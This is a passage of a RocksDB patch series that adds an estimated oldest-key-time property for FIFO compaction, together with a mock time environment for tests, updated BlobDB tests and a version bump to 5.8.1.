+        DB::Properties::kEstimateOldestKeyTime, &oldest_key_time));
+  }
+
+  options.compaction_style = kCompactionStyleFIFO;
+  options.compaction_options_fifo.ttl = 300;
+  options.compaction_options_fifo.allow_compaction = false;
+  DestroyAndReopen(options);
+
+  mock_env->set_current_time(100);
+  ASSERT_OK(Put("k1", "v1"));
+  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                       &oldest_key_time));
+  ASSERT_EQ(100, oldest_key_time);
+  ASSERT_OK(Flush());
+  ASSERT_EQ("1", FilesPerLevel());
+  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                       &oldest_key_time));
+  ASSERT_EQ(100, oldest_key_time);
+
+  mock_env->set_current_time(200);
+  ASSERT_OK(Put("k2", "v2"));
+  ASSERT_OK(Flush());
+  ASSERT_EQ("2", FilesPerLevel());
+  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                       &oldest_key_time));
+  ASSERT_EQ(100, oldest_key_time);
+
+  mock_env->set_current_time(300);
+  ASSERT_OK(Put("k3", "v3"));
+  ASSERT_OK(Flush());
+  ASSERT_EQ("3", FilesPerLevel());
+  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                       &oldest_key_time));
+  ASSERT_EQ(100, oldest_key_time);
+
+  mock_env->set_current_time(450);
+  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
+  ASSERT_EQ("2", FilesPerLevel());
+  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                       &oldest_key_time));
+  ASSERT_EQ(200, oldest_key_time);
+
+  mock_env->set_current_time(550);
+  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
+  ASSERT_EQ("1", FilesPerLevel());
+  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                       &oldest_key_time));
+  ASSERT_EQ(300, oldest_key_time);
+
+  mock_env->set_current_time(650);
+  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
+  ASSERT_EQ("", FilesPerLevel());
+  ASSERT_FALSE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
+                                        &oldest_key_time));
+
+  // Close before mock_env destructs.
+  Close();
+}
+
 #endif  // ROCKSDB_LITE
 }  // namespace rocksdb
diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc
index 73c6fe8016d..56e00df83f7 100644
--- a/db/db_sst_test.cc
+++ b/db/db_sst_test.cc
@@ -701,9 +701,13 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) {
   ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
                                        &total_sst_files_size));
   // Live SST files = 1 (compacted file)
-  // Total SST files = 6 (5 original files + compacted file)
-  ASSERT_EQ(live_sst_files_size, 1 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 6 * single_file_size);
+  // The 5 bytes difference comes from the oldest-key-time table property not
+  // being propagated on compaction. It is written with the default value
+  // std::numeric_limits<uint64_t>::max as a varint64.
+  ASSERT_EQ(live_sst_files_size, 1 * single_file_size + 5);
+
+  // Total SST files = 5 original files + compacted file
+  ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size);
 
   // hold current version
   std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
@@ -724,14 +728,14 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) {
                                        &total_sst_files_size));
   // Live SST files = 0
   // Total SST files = 6 (5 original files + compacted file)
-  ASSERT_EQ(total_sst_files_size, 6 * single_file_size);
+  ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size);
 
   iter1.reset();
   ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
                                        &total_sst_files_size));
   // Live SST files = 0
   // Total SST files = 1 (compacted file)
-  ASSERT_EQ(total_sst_files_size, 1 * single_file_size);
+  ASSERT_EQ(total_sst_files_size, live_sst_files_size);
 
   iter2.reset();
   ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
diff --git a/db/db_test_util.h b/db/db_test_util.h
index cd1265e21f1..f2caa46ca29 100644
--- a/db/db_test_util.h
+++ b/db/db_test_util.h
@@ -572,6 +572,37 @@ class SpecialEnv : public EnvWrapper {
   std::atomic<bool> is_wal_sync_thread_safe_{true};
 };
 
+class MockTimeEnv : public EnvWrapper {
+ public:
+  explicit MockTimeEnv(Env* base) : EnvWrapper(base) {}
+
+  virtual Status GetCurrentTime(int64_t* time) override {
+    assert(time != nullptr);
+    assert(current_time_ <=
+           static_cast<uint64_t>(std::numeric_limits<int64_t>::max()));
+    *time = static_cast<int64_t>(current_time_);
+    return Status::OK();
+  }
+
+  virtual uint64_t NowMicros() override {
+    assert(current_time_ <= std::numeric_limits<uint64_t>::max() / 1000000);
+    return current_time_ * 1000000;
+  }
+
+  virtual uint64_t NowNanos() override {
+    assert(current_time_ <= std::numeric_limits<uint64_t>::max() / 1000000000);
+    return current_time_ * 1000000000;
+  }
+
+  void set_current_time(uint64_t time) {
+    assert(time >= current_time_);
+    current_time_ = time;
+  }
+
+ private:
+  uint64_t current_time_ = 0;
+};
+
 #ifndef ROCKSDB_LITE
 class OnFileDeletionListener : public EventListener {
  public:
diff --git a/db/flush_job.cc b/db/flush_job.cc
index 846edb4074b..f0903f79b46 100644
--- a/db/flush_job.cc
+++ b/db/flush_job.cc
@@ -16,6 +16,7 @@
 
 #include
 #include
+#include <limits>
 #include
 
 #include "db/builder.h"
@@ -301,6 +302,8 @@ Status FlushJob::WriteLevel0Table() {
     db_options_.env->GetCurrentTime(&_current_time);  // ignore error
     const uint64_t current_time = static_cast<uint64_t>(_current_time);
 
+    uint64_t oldest_key_time = mems_.front()->ApproximateOldestKeyTime();
+
     s = BuildTable(
         dbname_, db_options_.env, *cfd_->ioptions(), mutable_cf_options_,
         optimized_env_options, cfd_->table_cache(), iter.get(),
@@ -311,7 +314,8 @@ Status FlushJob::WriteLevel0Table() {
         cfd_->ioptions()->compression_opts,
         mutable_cf_options_.paranoid_file_checks, cfd_->internal_stats(),
         TableFileCreationReason::kFlush, event_logger_, job_context_->job_id,
-        Env::IO_HIGH, &table_properties_, 0 /* level */, current_time);
+        Env::IO_HIGH, &table_properties_, 0 /* level */, current_time,
+        oldest_key_time);
     LogFlush(db_options_.info_log);
   }
   ROCKS_LOG_INFO(db_options_.info_log,
diff --git a/db/internal_stats.cc b/db/internal_stats.cc
index 54723ea91f6..2eff2865261 100644
--- a/db/internal_stats.cc
+++ b/db/internal_stats.cc
@@ -13,8 +13,9 @@
 #endif
 
 #include
-#include
 #include
+#include <limits>
+#include <string>
 #include
 #include
 #include "db/column_family.h"
@@ -243,6 +244,7 @@ static const std::string num_running_flushes = "num-running-flushes";
 static const std::string actual_delayed_write_rate =
    "actual-delayed-write-rate";
 static const std::string is_write_stopped = "is-write-stopped";
+static const std::string estimate_oldest_key_time = "estimate-oldest-key-time";
 
 const std::string DB::Properties::kNumFilesAtLevelPrefix =
     rocksdb_prefix + num_files_at_level_prefix;
@@ -316,6 +318,8 @@ const std::string DB::Properties::kActualDelayedWriteRate =
     rocksdb_prefix + actual_delayed_write_rate;
 const std::string DB::Properties::kIsWriteStopped =
     rocksdb_prefix + is_write_stopped;
+const std::string DB::Properties::kEstimateOldestKeyTime =
+    rocksdb_prefix + estimate_oldest_key_time;
 
 const std::unordered_map<std::string, DBPropertyInfo>
     InternalStats::ppt_name_to_info = {
@@ -414,6 +418,9 @@
          nullptr}},
        {DB::Properties::kIsWriteStopped,
         {false, nullptr, &InternalStats::HandleIsWriteStopped, nullptr}},
+       {DB::Properties::kEstimateOldestKeyTime,
+        {false, nullptr, &InternalStats::HandleEstimateOldestKeyTime,
+         nullptr}},
 };
 
 const DBPropertyInfo* GetPropertyInfo(const Slice& property) {
@@ -775,6 +782,30 @@
 bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db,
                                          Version* version) {
   return true;
 }
 
+bool InternalStats::HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* /*db*/,
+                                                Version* /*version*/) {
+  // TODO(yiwu): The property is currently available for fifo compaction
+  // with allow_compaction = false. This is because we don't propagate
+  // oldest_key_time on compaction.
+  if (cfd_->ioptions()->compaction_style != kCompactionStyleFIFO ||
+      cfd_->ioptions()->compaction_options_fifo.allow_compaction) {
+    return false;
+  }
+
+  TablePropertiesCollection collection;
+  auto s = cfd_->current()->GetPropertiesOfAllTables(&collection);
+  if (!s.ok()) {
+    return false;
+  }
+  *value = std::numeric_limits<uint64_t>::max();
+  for (auto& p : collection) {
+    *value = std::min(*value, p.second->oldest_key_time);
+  }
+  *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(),
+                     cfd_->imm()->ApproximateOldestKeyTime(), *value});
+  return *value < std::numeric_limits<uint64_t>::max();
+}
+
 void InternalStats::DumpDBStats(std::string* value) {
   char buf[1000];
   // DB-level stats, only available from default column family
diff --git a/db/internal_stats.h b/db/internal_stats.h
index 1dd393f73ce..a0b8a902718 100644
--- a/db/internal_stats.h
+++ b/db/internal_stats.h
@@ -475,6 +475,8 @@ class InternalStats {
   bool HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db,
                                     Version* version);
   bool HandleIsWriteStopped(uint64_t* value, DBImpl* db, Version* version);
+  bool HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* db,
+                                   Version* version);
 
   // Total number of background errors encountered. Every time a flush task
   // or compaction task fails, this counter is incremented. The failure can
The failure can diff --git a/db/memtable.cc b/db/memtable.cc index a24989123b3..9f2fd20bb50 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -9,8 +9,9 @@ #include "db/memtable.h" -#include #include +#include +#include #include "db/dbformat.h" #include "db/merge_context.h" @@ -96,7 +97,8 @@ MemTable::MemTable(const InternalKeyComparator& cmp, flush_state_(FLUSH_NOT_REQUESTED), env_(ioptions.env), insert_with_hint_prefix_extractor_( - ioptions.memtable_insert_with_hint_prefix_extractor) { + ioptions.memtable_insert_with_hint_prefix_extractor), + oldest_key_time_(std::numeric_limits::max()) { UpdateFlushState(); // something went wrong if we need to flush before inserting anything assert(!ShouldScheduleFlush()); @@ -202,6 +204,21 @@ void MemTable::UpdateFlushState() { } } +void MemTable::UpdateOldestKeyTime() { + uint64_t oldest_key_time = oldest_key_time_.load(std::memory_order_relaxed); + if (oldest_key_time == std::numeric_limits::max()) { + int64_t current_time = 0; + auto s = env_->GetCurrentTime(¤t_time); + if (s.ok()) { + assert(current_time >= 0); + // If fail, the timestamp is already set. + oldest_key_time_.compare_exchange_strong( + oldest_key_time, static_cast(current_time), + std::memory_order_relaxed, std::memory_order_relaxed); + } + } +} + int MemTable::KeyComparator::operator()(const char* prefix_len_key1, const char* prefix_len_key2) const { // Internal keys are encoded as length-prefixed strings. @@ -516,6 +533,7 @@ void MemTable::Add(SequenceNumber s, ValueType type, if (is_range_del_table_empty_ && type == kTypeRangeDeletion) { is_range_del_table_empty_ = false; } + UpdateOldestKeyTime(); } // Callback from MemTable::Get() diff --git a/db/memtable.h b/db/memtable.h index fe9feaf5706..9669a2157c4 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -348,6 +348,10 @@ class MemTable { const MemTableOptions* GetMemTableOptions() const { return &moptions_; } + uint64_t ApproximateOldestKeyTime() const { + return oldest_key_time_.load(std::memory_order_relaxed); + } + private: enum FlushStateEnum { FLUSH_NOT_REQUESTED, FLUSH_REQUESTED, FLUSH_SCHEDULED }; @@ -411,12 +415,17 @@ class MemTable { // Insert hints for each prefix. std::unordered_map insert_hints_; + // Timestamp of oldest key + std::atomic oldest_key_time_; + // Returns a heuristic flush decision bool ShouldFlushNow() const; // Updates flush_state_ using ShouldFlushNow() void UpdateFlushState(); + void UpdateOldestKeyTime(); + // No copying allowed MemTable(const MemTable&); MemTable& operator=(const MemTable&); diff --git a/db/memtable_list.cc b/db/memtable_list.cc index 8f710c2e970..c9a927c062f 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -10,6 +10,7 @@ #endif #include +#include #include #include "db/memtable.h" #include "db/version_set.h" @@ -447,6 +448,13 @@ size_t MemTableList::ApproximateUnflushedMemTablesMemoryUsage() { size_t MemTableList::ApproximateMemoryUsage() { return current_memory_usage_; } +uint64_t MemTableList::ApproximateOldestKeyTime() const { + if (!current_->memlist_.empty()) { + return current_->memlist_.back()->ApproximateOldestKeyTime(); + } + return std::numeric_limits::max(); +} + void MemTableList::InstallNewVersion() { if (current_->refs_ == 1) { // we're the only one using the version, just keep using it diff --git a/db/memtable_list.h b/db/memtable_list.h index ed475b83a10..628ab544b6c 100644 --- a/db/memtable_list.h +++ b/db/memtable_list.h @@ -217,6 +217,9 @@ class MemTableList { // the unflushed mem-tables. 
   size_t ApproximateUnflushedMemTablesMemoryUsage();
 
+  // Returns an estimate of the timestamp of the earliest key.
+  uint64_t ApproximateOldestKeyTime() const;
+
   // Request a flush of all existing memtables to storage.  This will
   // cause future calls to IsFlushPending() to return true if this list is
   // non-empty (regardless of the min_write_buffer_number_to_merge
diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h
index 078c24b4fa8..964f7b1db45 100644
--- a/include/rocksdb/db.h
+++ b/include/rocksdb/db.h
@@ -582,6 +582,12 @@ class DB {
 
     //  "rocksdb.is-write-stopped" - Return 1 if write has been stopped.
     static const std::string kIsWriteStopped;
+
+    //  "rocksdb.estimate-oldest-key-time" - returns an estimation of
+    //      oldest key timestamp in the DB. Currently only available for
+    //      FIFO compaction with
+    //      compaction_options_fifo.allow_compaction = false.
+    static const std::string kEstimateOldestKeyTime;
   };
 #endif /* ROCKSDB_LITE */
 
@@ -632,6 +638,7 @@ class DB {
   //  "rocksdb.num-running-flushes"
   //  "rocksdb.actual-delayed-write-rate"
   //  "rocksdb.is-write-stopped"
+  //  "rocksdb.estimate-oldest-key-time"
   virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
                               const Slice& property, uint64_t* value) = 0;
   virtual bool GetIntProperty(const Slice& property, uint64_t* value) {
diff --git a/include/rocksdb/table_properties.h b/include/rocksdb/table_properties.h
index 08360d1794a..e8bbabc3ba7 100644
--- a/include/rocksdb/table_properties.h
+++ b/include/rocksdb/table_properties.h
@@ -4,8 +4,9 @@
 #pragma once
 
 #include
-#include
+#include <limits>
 #include
+#include <string>
 #include "rocksdb/status.h"
 #include "rocksdb/types.h"
@@ -49,6 +50,7 @@ struct TablePropertiesNames {
   static const std::string kPropertyCollectors;
   static const std::string kCompression;
   static const std::string kCreationTime;
+  static const std::string kOldestKeyTime;
 };
 
 extern const std::string kPropertiesBlock;
@@ -162,6 +164,8 @@ struct TableProperties {
   // The time when the SST file was created.
   // Since SST files are immutable, this is equivalent to last modified time.
   uint64_t creation_time = 0;
+  // Timestamp of the earliest key
+  uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max();
 
   // Name of the column family with which this SST file is associated.
   // If column family is unknown, `column_family_name` will be an empty string.
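
For illustration (not part of the patch): a client can read the new property through `DB::GetIntProperty`. A minimal sketch, assuming `db` points to a DB opened with FIFO compaction and `compaction_options_fifo.allow_compaction = false`:

```cpp
#include <cstdint>
#include <iostream>
#include "rocksdb/db.h"

// Prints the estimated timestamp of the oldest key, if available.
void PrintOldestKeyTime(rocksdb::DB* db) {
  uint64_t oldest_key_time = 0;
  if (db->GetIntProperty(rocksdb::DB::Properties::kEstimateOldestKeyTime,
                         &oldest_key_time)) {
    std::cout << "estimated oldest key time: " << oldest_key_time << "\n";
  } else {
    // The property is unsupported for this compaction configuration.
    std::cout << "estimate-oldest-key-time not available\n";
  }
}
```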
diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc
index d42e0f8b7aa..d48c48cfdd1 100644
--- a/table/block_based_table_builder.cc
+++ b/table/block_based_table_builder.cc
@@ -276,6 +276,7 @@ struct BlockBasedTableBuilder::Rep {
   uint32_t column_family_id;
   const std::string& column_family_name;
   uint64_t creation_time = 0;
+  uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max();
 
   std::vector<std::unique_ptr<IntTblPropCollector>>
       table_properties_collectors;
 
@@ -288,7 +289,8 @@ struct BlockBasedTableBuilder::Rep {
       const CompressionType _compression_type,
       const CompressionOptions& _compression_opts,
       const std::string* _compression_dict, const bool skip_filters,
-      const std::string& _column_family_name, const uint64_t _creation_time)
+      const std::string& _column_family_name, const uint64_t _creation_time,
+      const uint64_t _oldest_key_time)
       : ioptions(_ioptions),
         table_options(table_opt),
         internal_comparator(icomparator),
@@ -305,7 +307,8 @@ struct BlockBasedTableBuilder::Rep {
                                            table_options, data_block)),
         column_family_id(_column_family_id),
         column_family_name(_column_family_name),
-        creation_time(_creation_time) {
+        creation_time(_creation_time),
+        oldest_key_time(_oldest_key_time) {
     if (table_options.index_type ==
         BlockBasedTableOptions::kTwoLevelIndexSearch) {
       p_index_builder_ = PartitionedIndexBuilder::CreateIndexBuilder(
@@ -344,7 +347,8 @@ BlockBasedTableBuilder::BlockBasedTableBuilder(
     const CompressionType compression_type,
     const CompressionOptions& compression_opts,
     const std::string* compression_dict, const bool skip_filters,
-    const std::string& column_family_name, const uint64_t creation_time) {
+    const std::string& column_family_name, const uint64_t creation_time,
+    const uint64_t oldest_key_time) {
   BlockBasedTableOptions sanitized_table_options(table_options);
   if (sanitized_table_options.format_version == 0 &&
       sanitized_table_options.checksum != kCRC32c) {
@@ -357,10 +361,11 @@ BlockBasedTableBuilder::BlockBasedTableBuilder(
     sanitized_table_options.format_version = 1;
   }
 
-  rep_ = new Rep(ioptions, sanitized_table_options, internal_comparator,
-                 int_tbl_prop_collector_factories, column_family_id, file,
-                 compression_type, compression_opts, compression_dict,
-                 skip_filters, column_family_name, creation_time);
+  rep_ =
+      new Rep(ioptions, sanitized_table_options, internal_comparator,
+              int_tbl_prop_collector_factories, column_family_id, file,
+              compression_type, compression_opts, compression_dict,
+              skip_filters, column_family_name, creation_time, oldest_key_time);
 
   if (rep_->filter_builder != nullptr) {
     rep_->filter_builder->StartBlock(0);
@@ -738,6 +743,7 @@ Status BlockBasedTableBuilder::Finish() {
     r->p_index_builder_->EstimateTopLevelIndexSize(r->offset);
   }
   r->props.creation_time = r->creation_time;
+  r->props.oldest_key_time = r->oldest_key_time;
 
   // Add basic properties
   property_block_builder.AddTableProperty(r->props);
diff --git a/table/block_based_table_builder.h b/table/block_based_table_builder.h
index 2e860627107..c9197ef5cce 100644
--- a/table/block_based_table_builder.h
+++ b/table/block_based_table_builder.h
@@ -47,7 +47,8 @@ class BlockBasedTableBuilder : public TableBuilder {
       const CompressionType compression_type,
       const CompressionOptions& compression_opts,
       const std::string* compression_dict, const bool skip_filters,
-      const std::string& column_family_name, const uint64_t creation_time = 0);
+      const std::string& column_family_name, const uint64_t creation_time = 0,
+      const uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max());
 
   // REQUIRES: Either Finish() or Abandon() has been called.
been called. ~BlockBasedTableBuilder(); diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index b4f8ba8a178..0c6bbbcb64b 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -79,7 +79,8 @@ TableBuilder* BlockBasedTableFactory::NewTableBuilder( table_builder_options.compression_dict, table_builder_options.skip_filters, table_builder_options.column_family_name, - table_builder_options.creation_time); + table_builder_options.creation_time, + table_builder_options.oldest_key_time); return table_builder; } diff --git a/table/meta_blocks.cc b/table/meta_blocks.cc index 1227bb0aeb7..19925d78897 100644 --- a/table/meta_blocks.cc +++ b/table/meta_blocks.cc @@ -77,6 +77,7 @@ void PropertyBlockBuilder::AddTableProperty(const TableProperties& props) { Add(TablePropertiesNames::kFixedKeyLen, props.fixed_key_len); Add(TablePropertiesNames::kColumnFamilyId, props.column_family_id); Add(TablePropertiesNames::kCreationTime, props.creation_time); + Add(TablePropertiesNames::kOldestKeyTime, props.oldest_key_time); if (!props.filter_policy_name.empty()) { Add(TablePropertiesNames::kFilterPolicy, props.filter_policy_name); @@ -211,6 +212,8 @@ Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, &new_table_properties->column_family_id}, {TablePropertiesNames::kCreationTime, &new_table_properties->creation_time}, + {TablePropertiesNames::kOldestKeyTime, + &new_table_properties->oldest_key_time}, }; std::string last_key; diff --git a/table/table_builder.h b/table/table_builder.h index ef2e608ed46..d0ca0678ef2 100644 --- a/table/table_builder.h +++ b/table/table_builder.h @@ -10,6 +10,7 @@ #pragma once #include +#include #include #include #include @@ -55,7 +56,8 @@ struct TableBuilderOptions { const CompressionOptions& _compression_opts, const std::string* _compression_dict, bool _skip_filters, const std::string& _column_family_name, int _level, - const uint64_t _creation_time = 0) + const uint64_t _creation_time = 0, + const int64_t _oldest_key_time = std::numeric_limits::max()) : ioptions(_ioptions), internal_comparator(_internal_comparator), int_tbl_prop_collector_factories(_int_tbl_prop_collector_factories), @@ -65,7 +67,8 @@ struct TableBuilderOptions { skip_filters(_skip_filters), column_family_name(_column_family_name), level(_level), - creation_time(_creation_time) {} + creation_time(_creation_time), + oldest_key_time(_oldest_key_time) {} const ImmutableCFOptions& ioptions; const InternalKeyComparator& internal_comparator; const std::vector>* @@ -78,6 +81,7 @@ struct TableBuilderOptions { const std::string& column_family_name; int level; // what level this table/file is on, -1 for "not set, don't know" const uint64_t creation_time; + const int64_t oldest_key_time; }; // TableBuilder provides the interface used to build a Table diff --git a/table/table_properties.cc b/table/table_properties.cc index ef77ae566aa..24453f6f9cd 100644 --- a/table/table_properties.cc +++ b/table/table_properties.cc @@ -139,6 +139,9 @@ std::string TableProperties::ToString( AppendProperty(result, "creation time", creation_time, prop_delim, kv_delim); + AppendProperty(result, "time stamp of earliest key", oldest_key_time, + prop_delim, kv_delim); + return result; } @@ -191,6 +194,8 @@ const std::string TablePropertiesNames::kPropertyCollectors = "rocksdb.property.collectors"; const std::string TablePropertiesNames::kCompression = "rocksdb.compression"; const std::string TablePropertiesNames::kCreationTime = "rocksdb.creation.time"; 
+const std::string TablePropertiesNames::kOldestKeyTime = + "rocksdb.oldest.key.time"; extern const std::string kPropertiesBlock = "rocksdb.properties"; // Old property block name for backward compatibility diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 41c1482e7e6..63b08bf459b 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -26,21 +26,9 @@ class BlobDBTest : public testing::Test { public: const int kMaxBlobSize = 1 << 14; - class MockEnv : public EnvWrapper { - public: - MockEnv() : EnvWrapper(Env::Default()) {} - - void set_now_micros(uint64_t now_micros) { now_micros_ = now_micros; } - - uint64_t NowMicros() override { return now_micros_; } - - private: - uint64_t now_micros_ = 0; - }; - BlobDBTest() : dbname_(test::TmpDir() + "/blob_db_test"), - mock_env_(new MockEnv()), + mock_env_(new MockTimeEnv(Env::Default())), blob_db_(nullptr) { Status s = DestroyBlobDB(dbname_, Options(), BlobDBOptions()); assert(s.ok()); @@ -147,7 +135,7 @@ class BlobDBTest : public testing::Test { } const std::string dbname_; - std::unique_ptr mock_env_; + std::unique_ptr mock_env_; std::shared_ptr ttl_extractor_; BlobDB *blob_db_; }; // class BlobDBTest @@ -174,13 +162,13 @@ TEST_F(BlobDBTest, PutWithTTL) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { uint64_t ttl = rnd.Next() % 100; PutRandomWithTTL("key" + ToString(i), ttl, &rnd, (ttl <= 50 ? nullptr : &data)); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -203,13 +191,13 @@ TEST_F(BlobDBTest, PutUntil) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { uint64_t expiration = rnd.Next() % 100 + 50; PutRandomUntil("key" + ToString(i), expiration, &rnd, (expiration <= 100 ? nullptr : &data)); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -236,12 +224,13 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(0); + mock_env_->set_current_time(0); for (size_t i = 0; i < 100; i++) { PutRandom("key" + ToString(i), &rnd, &data); } // very far in the future.. 
- mock_env_->set_now_micros(std::numeric_limits<uint64_t>::max() - 10); + mock_env_->set_current_time(std::numeric_limits<uint64_t>::max() / 1000000 - + 10); auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -282,11 +271,11 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; Open(bdb_options, options); - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { PutRandom("key" + ToString(i), &rnd); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -329,11 +318,11 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; Open(bdb_options, options); - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { PutRandom("key" + ToString(i), &rnd); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -377,7 +366,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map<std::string, std::string> data; - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { int len = rnd.Next() % kMaxBlobSize + 1; std::string key = "key" + ToString(i); @@ -390,7 +379,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { data[key] = value; } } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -657,14 +646,14 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options, options); - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200)); BlobDBImpl *blob_db_impl = static_cast_with_check<BlobDBImpl, DB>(blob_db_); auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); - mock_env_->set_now_micros(300 * 1000000); + mock_env_->set_current_time(300); SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", From 2879f4bebd9a717f2865afd1034838c1627554e5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 23 Oct 2017 22:08:21 -0700 Subject: [PATCH 166/205] Bump version to 5.8.1 --- HISTORY.md | 2 +- include/rocksdb/version.h | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 23bcdaee22a..e62622e081c 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,5 @@ # Rocksdb Change Log -## Unreleased +## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false.
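The property added above is read through the standard integer-property interface. A minimal sketch of how a caller might poll it, assuming a DB opened with FIFO compaction and compaction_options_fifo.allow_compaction = false (the path and error handling here are illustrative, not part of the patch):

#include <cstdint>
#include <iostream>

#include "rocksdb/db.h"
#include "rocksdb/options.h"

int main() {
  rocksdb::Options options;
  options.create_if_missing = true;
  options.compaction_style = rocksdb::kCompactionStyleFIFO;
  options.compaction_options_fifo.allow_compaction = false;  // required
  rocksdb::DB* db = nullptr;
  rocksdb::Status s = rocksdb::DB::Open(options, "/tmp/fifo_demo", &db);
  if (!s.ok()) {
    return 1;
  }
  uint64_t oldest_key_time = 0;
  // GetIntProperty() returns false when the estimate is unavailable,
  // e.g. for other compaction styles.
  if (db->GetIntProperty("rocksdb.estimate-oldest-key-time",
                         &oldest_key_time)) {
    std::cout << "estimated oldest key time: " << oldest_key_time << "\n";
  }
  delete db;
  return 0;
}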
